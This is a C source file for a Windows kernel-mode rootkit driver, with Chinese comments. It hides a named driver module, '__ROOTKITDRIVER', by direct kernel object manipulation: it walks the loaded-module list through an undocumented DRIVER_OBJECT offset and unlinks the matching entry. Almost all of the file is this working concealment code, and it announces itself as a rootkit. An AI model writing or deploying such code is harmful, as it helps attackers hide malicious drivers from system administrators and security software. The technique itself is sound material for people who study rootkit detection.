dkom.c

ntrootkit 驱动类 隐藏驱动模块

/*///////////////////////////////////////

DKOM方法隐藏驱动模块 要隐藏的模块名称通过
宏 HIDEDRIVER来指定
ineverland@163.com
/*///////////////////////////////////////

#include "ntddk.h"
#include "stdlib.h"
#include "stdio.h"
#include "windef.h"


#define  HIDEDRIVER "__ROOTKITDRIVER" //隐藏的进程名

typedef struct _MODULE_ENTRY {
	LIST_ENTRY le_mod;
	DWORD  unknown[4];
	DWORD  base;
	DWORD  driver_start;
	DWORD  unk1;
	UNICODE_STRING driver_Path;
	UNICODE_STRING driver_Name;
	//...
} MODULE_ENTRY, *PMODULE_ENTRY;

VOID UnLoad(IN PDRIVER_OBJECT pDriverObject)
{
   DbgPrint("Unload\n");
}


//未使用
void Cheat()
{


  PUCHAR ptr;
  PUCHAR calladdr;
  //ptr=(PUCHAR)NtSetTimer;

 // DbgPrint("0x%02x\n",*(PUCHAR)KiDispatchInterrupt);




}

DWORD FindPsLoadedModuleList (IN PDRIVER_OBJECT  DriverObject)
{
	PMODULE_ENTRY pm_current;

	if (DriverObject == NULL)
		return 0;

	pm_current = *((PMODULE_ENTRY*)((DWORD)DriverObject + 0x14));
	if (pm_current == NULL)
		return 0;
	
	return (DWORD) pm_current;
}

NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverObject,IN PUNICODE_STRING pRegistryPath )
{

	UNICODE_STRING uni_drivername;
	ANSI_STRING    drivername;
    PMODULE_ENTRY pm_current;
	PMODULE_ENTRY pm_driverlist;
    NTSTATUS ntStatus;
	pDriverObject->DriverUnload  = UnLoad; 

	DbgPrint("the rootkit has been loaded!\n");
	drivername.Length = (USHORT) strlen(HIDEDRIVER);
	drivername.MaximumLength = (USHORT) strlen(HIDEDRIVER);
	drivername.Buffer = (PCHAR)HIDEDRIVER;
	pm_driverlist=(PMODULE_ENTRY)FindPsLoadedModuleList(pDriverObject); //得到 driverobject list
    
    ntStatus = RtlAnsiStringToUnicodeString(&uni_drivername, &drivername, TRUE);
    if(!NT_SUCCESS(ntStatus)) 
	{
		
		return STATUS_SUCCESS;
	}
    pm_current=pm_driverlist;
    while((PMODULE_ENTRY)pm_current->le_mod.Flink !=pm_driverlist) //遍历驱动双链表
	{
	   if ((pm_current->unk1 != 0x00000000) && (pm_current->driver_Path.Length != 0))
	   {
	       if(RtlCompareUnicodeString(&uni_drivername, &(pm_current->driver_Name), FALSE) == 0) //比较名字 Unicode
		   {
				*((PDWORD)pm_current->le_mod.Blink)        = (DWORD) pm_current->le_mod.Flink;
				pm_current->le_mod.Flink->Blink            = pm_current->le_mod.Blink;
				DbgPrint("Just hid %s\n",drivername.Buffer);
				break;
		   }
	   }
	   pm_current =  (MODULE_ENTRY*)pm_current->le_mod.Flink;
	}
		
	if( NT_SUCCESS(ntStatus))
		{
			RtlFreeUnicodeString(&uni_drivername);
		}
	


  return STATUS_SUCCESS;
}